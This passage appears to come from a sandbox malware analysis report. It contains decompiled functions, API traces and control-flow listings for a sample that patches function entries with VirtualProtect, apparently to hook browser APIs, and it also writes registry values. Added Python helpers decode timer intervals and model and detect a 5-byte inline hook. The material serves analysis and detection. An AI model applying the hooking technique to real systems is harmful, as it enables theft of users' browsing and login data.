                            								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                            								_v128 = _t65;
                            								__eflags = _t65;
                            								if(_t65 == 0) {
                            									goto L6;
                            								} else {
                            									goto L12;
                            								}
                            							}
                            						}
                            						L25:
                            					}
                            					L12:
                            					_t82 =  &_v72;
                            					_t73 = 3;
                            					do {
                            						_t54 =  *_t82;
                            						if(_t54 != 0) {
                            							RtlFreeHeap( *0x4a1a2d8, 0, _t54); // executed
                            						}
                            						_t82 =  &(_t82[4]);
                            						_t73 = _t73 - 1;
                            					} while (_t73 != 0);
                            					FindCloseChangeNotification(_v80); // executed
                            				}
                            				return _v92.HighPart;
                            				goto L25;
                            			}

                            APIs
                            • memset.NTDLL ref: 04A16637
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04A16643
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04A1666B
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04A1668B
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04A13EE8,?), ref: 04A166A6
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04A13EE8,?,00000000), ref: 04A1674D
                            • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04A13EE8,?,00000000,?,?), ref: 04A1675D
                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04A16797
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 04A167B1
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04A167BD
                              • Part of subcall function 04A1216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05539400,00000000,?,7620F710,00000000,7620F730), ref: 04A121BB
                              • Part of subcall function 04A1216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05539438,?,00000000,30314549,00000014,004F0053,055393F4), ref: 04A12258
                              • Part of subcall function 04A1216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04A166BE), ref: 04A1226A
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04A13EE8,?,00000000,?,?), ref: 04A167D0
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$ChangeCloseCreateErrorFindLastNotificationmemset
                            • String ID:
                            • API String ID: 1236040543-0
                            • Opcode ID: 85b09a7de7bcea9479d90563d81dc7278c1a68be9249c407f719aa3ba7e4d467
                            • Instruction ID: 8cee47abab50ccf043446e2533613a4ad4b2d5649d7bb5fae934fd2ea6fe4558
                            • Opcode Fuzzy Hash: 85b09a7de7bcea9479d90563d81dc7278c1a68be9249c407f719aa3ba7e4d467
                            • Instruction Fuzzy Hash: 6A517BB1509320AFD711EF15DC44AABBBECEB89764F004A1EF8A4D2170D774A905CFA6
                            Uniqueness

                            Uniqueness Score: -1.00%
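The sleep in E04A1661D is built from a waitable timer rather than Sleep: the code pushes 0xffffffff and 0xff676980 as one 64-bit operand of _allmul (the API line above prints that high half as 000000FF), multiplies it by the global at 0x4a1a2e0 and hands the product to SetWaitableTimer, then waits with WaitForMultipleObjects on two handles (the timer and one loaded from 0x4a1a30c) and only continues its loop when the first of them, index 0, is signalled. The retry path at L17 does the same with 0xdc3cba00 and the global at 0x4a1a2e8. A negative due time means a relative interval in 100 ns units, so those constants are 1 second and 60 seconds; the values of the two globals are not shown on this page. The block below is an added Python helper, not Joe Sandbox output or code from the sample, that reassembles the operands, converts a due time to seconds and renders the LARGE_INTEGER as it sits in memory; the counts it multiplies by are assumed inputs.

```python
import struct

HUNDRED_NS_PER_SECOND = 10_000_000  # unit of the SetWaitableTimer due time

WAIT_OBJECT_0, WAIT_ABANDONED_0, WAIT_TIMEOUT, WAIT_FAILED = 0x0, 0x80, 0x102, 0xFFFFFFFF


def allmul_operand(lo: int, hi: int) -> int:
    """Rebuild one signed 64-bit _allmul operand from its two pushed 32-bit halves."""
    return struct.unpack("<q", struct.pack("<II", lo & 0xFFFFFFFF, hi & 0xFFFFFFFF))[0]


def due_time(count: int, lo: int, hi: int) -> int:
    """Value that reaches SetWaitableTimer: a count from a global (assumed input here) times the constant."""
    return count * allmul_operand(lo, hi)


def describe_due_time(due: int):
    """Negative = relative interval; non-negative = absolute FILETIME (100 ns ticks since 1601)."""
    if due < 0:
        return ("relative", -due / HUNDRED_NS_PER_SECOND)
    return ("absolute_filetime", due)


def large_integer_bytes(due: int) -> bytes:
    """Little-endian LARGE_INTEGER as it appears in a stack or heap dump."""
    return struct.pack("<q", due)


def from_large_integer_bytes(raw: bytes) -> int:
    """Inverse of large_integer_bytes, for values carved out of a dump."""
    return struct.unpack("<q", raw[:8])[0]


def wait_result(ret: int, count: int = 2):
    """Classify a WaitForMultipleObjects return value; the sample loops only on ('signaled', 0)."""
    if ret == WAIT_FAILED:
        return ("failed", None)
    if ret == WAIT_TIMEOUT:
        return ("timeout", None)
    if WAIT_ABANDONED_0 <= ret < WAIT_ABANDONED_0 + count:
        return ("abandoned", ret - WAIT_ABANDONED_0)
    if WAIT_OBJECT_0 <= ret < WAIT_OBJECT_0 + count:
        return ("signaled", ret - WAIT_OBJECT_0)
    return ("unknown", ret)


if __name__ == "__main__":
    # The two constant operands seen in the decompilation (assumed count of 1 for each).
    for lo, hi in ((0xFF676980, 0xFFFFFFFF), (0xDC3CBA00, 0xFFFFFFFF)):
        d = due_time(1, lo, hi)
        print(hex(lo), hex(hi), allmul_operand(lo, hi), describe_due_time(d), large_integer_bytes(d).hex())
```

With a count of 1 the first operand yields a 1 second relative wait and the second a 60 second one; multiplying by the globals gives the real interval, so the first path sleeps that many seconds and the retry path that many minutes.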

                             Control-flow Graph

                             Basic blocks (id, address range, calls in the block, successor blocks):
                             • 318 4f61a0a-4f61a2b call 4f83d64 -> 321, 322
                             • 321 4f61a31-4f61a32 -> 323, 324
                             • 322 4f61b0d -> 325
                             • 323 4f61a34-4f61a37 -> 328, 329
                             • 324 4f61a98-4f61a9f -> 326, 327
                             • 325 4f61b13-4f61b22 VirtualProtect -> 330, 331
                             • 326 4f61ae0-4f61af5 VirtualProtect -> 325, 334
                             • 327 4f61aa1-4f61aa8 -> 326, 333
                             • 328 4f61b64-4f61b70 call 4f83d9f (no successors)
                             • 329 4f61a3d -> 335
                             • 330 4f61b24-4f61b3a VirtualProtect -> 335
                             • 331 4f61b3f-4f61b45 GetLastError -> 328
                             • 333 4f61aaa-4f61ab6 -> 325, 339
                             • 334 4f61af7-4f61b0b -> 340
                             • 335 4f61a43-4f61a4a -> 336, 337
                             • 336 4f61a8c-4f61a93 -> 328
                             • 337 4f61a4c-4f61a50 -> 336, 341
                             • 339 4f61ab8-4f61ac5 VirtualProtect -> 325, 342
                             • 340 4f61adc-4f61ade VirtualProtect -> 325
                             • 341 4f61a52-4f61a6e lstrlen, VirtualProtect -> 336, 343
                             • 342 4f61ac7-4f61adb -> 340
                             • 343 4f61a70-4f61a8a lstrcpy, VirtualProtect -> 336
                            APIs
                            • lstrlen.KERNEL32(?,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977,04F7893A,?,?), ref: 04F61A58
                            • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61A6A
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F61A79
                            • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61A8A
                            • VirtualProtect.KERNEL32(00000001,00000005,00000040,-0000001C,04F86040,00000018,04F634DB,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000), ref: 04F61AC1
                            • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61ADC
                            • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,04F86040,00000018,04F634DB,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000), ref: 04F61AF1
                            • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,04F86040,00000018,04F634DB,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000), ref: 04F61B1E
                            • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61B38
                            • GetLastError.KERNEL32(?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977,04F7893A,?,?), ref: 04F61B3F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                            • String ID:
                            • API String ID: 3676034644-0
                            • Opcode ID: 0ba1f586ce2b8e1279086e2dd1955880971e11aae070a8a8311c2af6a2bd2a71
                            • Instruction ID: 7c6cff9227f442fa6063aa68e987d77cdff72be82649f93b5892731a3d7509b5
                            • Opcode Fuzzy Hash: 0ba1f586ce2b8e1279086e2dd1955880971e11aae070a8a8311c2af6a2bd2a71
                            • Instruction Fuzzy Hash: C8413F71A00709AFDB21DFA4CD44EAAB7F9FB04710F048619E652AA1A0E734F806DF60
                            Uniqueness

                            Uniqueness Score: -1.00%
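The VirtualProtect calls in this function come in pairs: one with a length of 5 and a new protection of 0x40 (PAGE_EXECUTE_READWRITE), and one that restores the previous value, with lstrlen/lstrcpy on another path copying a string into memory that was made writable the same way. A 5-byte window opened for writing at an address and closed again is the shape of an inline patch at a function entry, which is how web injects hook browser APIs; the listing shows only the protection changes, not the bytes written. The block below is an added Python model, not code from the sample or from Joe Sandbox. It assumes the 5-byte write is an E9 jmp rel32 (the most common 5-byte hook, an assumption here), uses 32-bit x86 semantics for the redirects it decodes, and builds a fake module with made-up export names, base address and hook target to show the check an analyst runs on a dump: compare each export's entry bytes against a clean copy and resolve any redirect found.

```python
import struct

PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
# PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
WRITABLE = {0x04, 0x08, 0x40, 0x80}
HOOK_LEN = 5  # size of 'jmp rel32', matching the length passed to VirtualProtect in the trace


def build_jmp_rel32(hook_at: int, target: int) -> bytes:
    """Encode E9 <rel32>; the displacement is measured from the end of the 5-byte instruction."""
    rel = (target - (hook_at + HOOK_LEN)) & 0xFFFFFFFF
    return b"\xE9" + struct.pack("<I", rel)


class Image:
    """Toy view of one mapped code region with a single protection value and a VirtualProtect log."""

    def __init__(self, base: int, code: bytes, protect: int = PAGE_EXECUTE_READ):
        self.base, self.mem, self.protect = base, bytearray(code), protect
        self.protect_log = []  # (address, size, new_protect) in call order

    def virtual_protect(self, addr: int, size: int, new_protect: int) -> int:
        old, self.protect = self.protect, new_protect
        self.protect_log.append((addr, size, new_protect))
        return old  # what a real caller gets back through lpflOldProtect

    def read(self, addr: int, n: int) -> bytes:
        off = addr - self.base
        return bytes(self.mem[off:off + n])

    def write(self, addr: int, data: bytes) -> None:
        if self.protect not in WRITABLE:
            raise PermissionError(f"region is 0x{self.protect:X}, not writable")
        off = addr - self.base
        self.mem[off:off + len(data)] = data


def install_inline_hook(img: Image, func_va: int, target: int) -> bytes:
    """Same shape as the trace: VirtualProtect(addr, 5, 0x40) -> patch -> VirtualProtect(addr, 5, old)."""
    old = img.virtual_protect(func_va, HOOK_LEN, PAGE_EXECUTE_READWRITE)
    saved = img.read(func_va, HOOK_LEN)  # original bytes a trampoline would need
    img.write(func_va, build_jmp_rel32(func_va, target))
    img.virtual_protect(func_va, HOOK_LEN, old)
    return saved


def resolve_redirect(prologue: bytes, func_va: int):
    """Decode a control-flow redirect at a function entry (32-bit x86). None if nothing recognised."""
    if len(prologue) >= 5 and prologue[0] == 0xE9:  # jmp rel32
        rel = struct.unpack_from("<i", prologue, 1)[0]
        return ("jmp_rel32", (func_va + 5 + rel) & 0xFFFFFFFF)
    if len(prologue) >= 6 and prologue[:2] == b"\xFF\x25":  # jmp dword ptr [abs32]
        return ("jmp_indirect", struct.unpack_from("<I", prologue, 2)[0])
    if len(prologue) >= 6 and prologue[0] == 0x68 and prologue[5] == 0xC3:  # push imm32; ret
        return ("push_ret", struct.unpack_from("<I", prologue, 1)[0])
    return None


def find_hooked_exports(live: Image, clean: Image, exports: dict, width: int = 8) -> list:
    """Compare each export's entry bytes in the live image with a clean copy; report redirects."""
    hits = []
    for name, va in exports.items():
        if live.read(va, width) != clean.read(va, width):
            hits.append((name, va, resolve_redirect(live.read(va, width), va)))
    return hits


def demo():
    """Constructed scenario: two fake exports with a 'mov edi,edi; push ebp; mov ebp,esp' entry."""
    base = 0x76200000  # hypothetical module base
    code = bytearray(0x300)
    exports = {"HttpSendRequestA": base + 0x100, "InternetReadFile": base + 0x200}
    for va in exports.values():
        code[va - base:va - base + 5] = b"\x8B\xFF\x55\x8B\xEC"
    clean, live = Image(base, code), Image(base, code)
    target = 0x04F70000  # hypothetical address inside an injected region
    saved = install_inline_hook(live, exports["HttpSendRequestA"], target)
    return saved, live.protect_log, find_hooked_exports(live, clean, exports)


if __name__ == "__main__":
    saved, log, hits = demo()
    print("saved prologue:", saved.hex())
    print("protection changes:", [(hex(a), s, hex(p)) for a, s, p in log])
    print("hooked exports:", hits)
```

The protection log reproduces the pair of calls seen in the trace (length 5, 0x40, then the old value back), and the write is refused if the region has not been made writable first, which is why the sample cannot skip the first VirtualProtect. On a real dump the clean copy comes from the module on disk, relocated to the same base.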

                            Control-flow Graph

                            C-Code - Quality: 93%
                            			E04A14274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                            				void* _t17;
                            				void* _t18;
                            				void* _t19;
                            				void* _t20;
                            				void* _t21;
                            				intOrPtr _t24;
                            				void* _t37;
                            				void* _t41;
                            				intOrPtr* _t45;
                            
                            				_t41 = __edi;
                            				_t37 = __ebx;
                            				_t45 = __eax;
                            				_t16 =  *((intOrPtr*)(__eax + 0x20));
                            				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                            					E04A16E40(_t16, __ecx, 0xea60);
                            				}
                            				_t17 =  *(_t45 + 0x18);
                            				_push(_t37);
                            				_push(_t41);
                            				if(_t17 != 0) {
                            					InternetSetStatusCallback(_t17, 0);
                            					InternetCloseHandle( *(_t45 + 0x18)); // executed
                            				}
                            				_t18 =  *(_t45 + 0x14);
                            				if(_t18 != 0) {
                            					InternetSetStatusCallback(_t18, 0);
                            					InternetCloseHandle( *(_t45 + 0x14));
                            				}
                            				_t19 =  *(_t45 + 0x10);
                            				if(_t19 != 0) {
                            					InternetSetStatusCallback(_t19, 0);
                            					InternetCloseHandle( *(_t45 + 0x10));
                            				}
                            				_t20 =  *(_t45 + 0x1c);
                            				if(_t20 != 0) {
                            					FindCloseChangeNotification(_t20); // executed
                            				}
                            				_t21 =  *(_t45 + 0x20);
                            				if(_t21 != 0) {
                            					CloseHandle(_t21);
                            				}
                            				_t22 =  *((intOrPtr*)(_t45 + 8));
                            				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                            					E04A16C2C(_t22);
                            					 *((intOrPtr*)(_t45 + 8)) = 0;
                            					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                            				}
                            				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                            				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                            					E04A16C2C(_t23);
                            				}
                            				_t24 =  *_t45;
                            				if(_t24 != 0) {
                            					_t24 = E04A16C2C(_t24);
                            				}
                            				_t46 =  *((intOrPtr*)(_t45 + 4));
                            				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                            					return E04A16C2C(_t46);
                            				}
                            				return _t24;
                            			}

                            APIs
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 04A142A2
                            • InternetCloseHandle.WININET(?), ref: 04A142A7
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 04A142B2
                            • InternetCloseHandle.WININET(?), ref: 04A142B7
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 04A142C2
                            • InternetCloseHandle.WININET(?), ref: 04A142C7
                            • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,04A13801,?,?,761F81D0,00000000,00000000), ref: 04A142D7
                            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04A13801,?,?,761F81D0,00000000,00000000), ref: 04A142E1
                              • Part of subcall function 04A16E40: WaitForMultipleObjects.KERNEL32(00000002,04A17BB5,00000000,04A17BB5,?,?,?,04A17BB5,0000EA60), ref: 04A16E5B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                            • String ID:
                            • API String ID: 2172891992-0
                            • Opcode ID: 455a14dd8299d31ba1f165ee3405cb596cbb2ec6b729a1b03f30ffdd246c4d75
                            • Instruction ID: be413e3a0abc4c4c8d28663afc45f5dbdedbbebefb31ca9560f69370ad31c41f
                            • Opcode Fuzzy Hash: 455a14dd8299d31ba1f165ee3405cb596cbb2ec6b729a1b03f30ffdd246c4d75
                            • Instruction Fuzzy Hash: 2D11E97A6006485BC630AFBEED84C5BB7EEEF483143550D1DE446D7960C735F8858A64
                            Uniqueness

                            Uniqueness Score: -1.00%

                             Control-flow Graph

                             Basic blocks (id, address range, calls in the block, successor blocks):
                             • 401 4f73959-4f73991 call 4f7bad1 -> 404, 405
                             • 404 4f739f5-4f73a0a WaitForSingleObject -> 406, 407
                             • 405 4f73993 -> 408
                             • 406 4f73af4-4f73b2d RtlExitUserThread -> 409, 410
                             • 407 4f73a10-4f73a1e -> 411, 412
                             • 408 4f73996-4f739ab call 4f7a651 -> 421, 422
                             • 409 4f73b40-4f73b67 CreateProcessA -> 418, 419
                             • 410 4f73b2f-4f73b3b -> 409, 433
                             • 411 4f73a24-4f73a45 RegOpenKeyA -> 416, 417
                             • 412 4f73ab0-4f73ac3 call 4f73829 -> 406, 431
                             • 416 4f73a47-4f73a69 RegSetValueExA, RegCloseKey -> 417
                             • 417 4f73a6f-4f73a72 -> 427, 428
                             • 418 4f73b74-4f73b76 -> 423, 424
                             • 419 4f73b69-4f73b6f call 4f75d7a -> 418
                             • 421 4f739ad-4f739c4 -> 422, 438
                             • 422 4f739dc-4f739f3 call 4f7e803 -> 404, 408
                             • 423 4f73b7e-4f73b8c (no successors)
                             • 424 4f73b78-4f73b79 call 4f7e803 -> 423
                             • 427 4f73a74-4f73a77 -> 412, 428
                             • 428 4f73a79-4f73aad call 4f7e778 -> 412
                             • 431 4f73ac5-4f73ad4 WaitForSingleObject -> 406, 436
                             • 433 4f73b3d -> 409
                             • 436 4f73ad6-4f73af1 call 4f7d30a -> 406
                             • 438 4f739c6-4f739d7 call 4f6f39b -> 422
                            APIs
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 04F7BB1D
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 04F7BB29
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BB71
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BB8C
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BBC4
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?), ref: 04F7BBCC
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BBEF
                              • Part of subcall function 04F7BAD1: wcscpy.NTDLL ref: 04F7BC01
                            • WaitForSingleObject.KERNEL32(00000000,?,06319998,?,00000000,00000000,00000001), ref: 04F73A03
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F73A3D
                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 04F73A60
                            • RegCloseKey.ADVAPI32(?), ref: 04F73A69
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F73ACD
                            • RtlExitUserThread.NTDLL(?), ref: 04F73B03
                              • Part of subcall function 04F7A651: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,761B6920,00000000,?,?,?,04F6148A,?,?,?), ref: 04F7A66F
                              • Part of subcall function 04F7A651: GetFileSize.KERNEL32(00000000,00000000,?,?,04F6148A,?,?,?), ref: 04F7A67F
                              • Part of subcall function 04F7A651: CloseHandle.KERNEL32(000000FF,?,?,04F6148A,?,?,?), ref: 04F7A6E1
                            • CreateProcessA.KERNEL32(?,?,?,7620F750,?,?,?,?,?,?,?,?,7620F750), ref: 04F73B5C
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 04F6F3DB
                              • Part of subcall function 04F6F39B: GetLastError.KERNEL32 ref: 04F6F3E5
                              • Part of subcall function 04F6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 04F6F40A
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 04F6F42D
                              • Part of subcall function 04F6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 04F6F455
                              • Part of subcall function 04F6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 04F6F46A
                              • Part of subcall function 04F6F39B: SetEndOfFile.KERNEL32(00001000), ref: 04F6F477
                              • Part of subcall function 04F6F39B: CloseHandle.KERNEL32(00001000), ref: 04F6F48F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Createlstrlen$CloseObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerProcessSizeThreadUserValueWritewcscpy
                            • String ID:
                            • API String ID: 3876914104-0
                            • Opcode ID: fc23340dcc3f7968fcadfbe79058e61d5e504fc5337c0229384915fb3be08a9f
                            • Instruction ID: 3e0084625ae96788c0b5c6498db90e63181a349a77240ffc2dd34151bc8cdb8c
                            • Opcode Fuzzy Hash: fc23340dcc3f7968fcadfbe79058e61d5e504fc5337c0229384915fb3be08a9f
                            • Instruction Fuzzy Hash: 6C612F71A00209BFEB11DF95EC85EAE77B9EB08314F01406AF915AB250D778E952DF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 04F633A5: VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 04F633CA
                              • Part of subcall function 04F633A5: GetLastError.KERNEL32(?,00000000), ref: 04F633D2
                              • Part of subcall function 04F633A5: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 04F633E9
                              • Part of subcall function 04F633A5: VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 04F6340E
                            • GetLastError.KERNEL32(00000000,00000004,?,?,80000000,00000000,00000001,04F860B0,0000001C,04F7BE61,00000002,?,00000001,80000000,04F89A20,80000000), ref: 04F68D90
                              • Part of subcall function 04F6A253: lstrlen.KERNEL32(?,?), ref: 04F6A28B
                              • Part of subcall function 04F6A253: lstrcpy.KERNEL32(00000000,?), ref: 04F6A2A2
                              • Part of subcall function 04F6A253: StrChrA.SHLWAPI(00000000,0000002E), ref: 04F6A2AB
                              • Part of subcall function 04F6A253: GetModuleHandleA.KERNEL32(00000000), ref: 04F6A2C9
                            • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 04F68D0D
                            • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,04F860B0,0000001C,04F7BE61), ref: 04F68D28
                            • RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F68D4D
                            • RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F68D6B
                              • Part of subcall function 04F633A5: SetLastError.KERNEL32(80000000,?,00000000), ref: 04F63417
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                            • String ID:
                            • API String ID: 899430048-3916222277
                            • Opcode ID: 3316763a39d662a6b5c953a551e8a547cb3c15629d300b9e29e77764a8bae4e0
                            • Instruction ID: fb41d85201220f699af65c94ad9988defc9ee2445773eecddd8a8ebdfef9caaf
                            • Opcode Fuzzy Hash: 3316763a39d662a6b5c953a551e8a547cb3c15629d300b9e29e77764a8bae4e0
                            • Instruction Fuzzy Hash: 5E415D7190161AEFDB10EF68D848AAEBBF4FF08354F14811DE916AB250D774E952CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                             Control-flow Graph

                             [Graph image not rendered; block list recovered from the graph dump] Function 4f755e4-4f75719, 21 basic blocks. Entry block 4f755e4-4f75623 calls 4f761ae and VirtualAlloc. Blocks 4f75629-4f7563f, 4f75641-4f75645 and 4f75647-4f75665 (VirtualFree, VirtualAlloc) form a retry loop that calls 4f761ae again with a reallocated buffer. Blocks 4f75688-4f75695, 4f75697-4f756a0 (lstrcmpi), 4f756a2-4f756ad (StrChrA, '.') , 4f756af-4f756bb (lstrcmpi) and 4f756bd-4f756cd form the search loop, comparing each entry once as given and once at the first '.' found by StrChrA. Blocks 4f756d1-4f756f2 and 4f756f4-4f756fe lead to the exit path 4f75700-4f75719, which releases the buffer with VirtualFree when one was allocated.
                            APIs
                              • Part of subcall function 04F761AE: GetProcAddress.KERNEL32(?,00000318), ref: 04F761D3
                              • Part of subcall function 04F761AE: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04F761EF
                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04F7561D
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04F75708
                              • Part of subcall function 04F761AE: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04F76359
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04F75653
                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04F7565F
                            • lstrcmpi.KERNEL32(?,00000000), ref: 04F7569C
                            • StrChrA.SHLWAPI(?,0000002E), ref: 04F756A5
                            • lstrcmpi.KERNEL32(?,00000000), ref: 04F756B7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                            • String ID:
                            • API String ID: 3901270786-0
                            • Opcode ID: 881bc17c41d38658b4f5e162945e4242a6e5180cec1b8cf814b2b10d136a14dc
                            • Instruction ID: 7b78d7eb7d29f6fedc66d885043d7143768370e64e2c336e55ae3ce85987d272
                            • Opcode Fuzzy Hash: 881bc17c41d38658b4f5e162945e4242a6e5180cec1b8cf814b2b10d136a14dc
                            • Instruction Fuzzy Hash: 0A316371904315BBE7218F11DC84F2BBBE8FF84B94F10191AF984A7680D778E905CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                             			// Resolves ntdll section primitives through subcall 04A144DE (the DWORD
                             			// arguments in the APIs list below are the first four bytes of the requested
                             			// names read little-endian: ZwCr.., ZwMa.., ZwUn.., RtlN.., ZwCl..; decoded
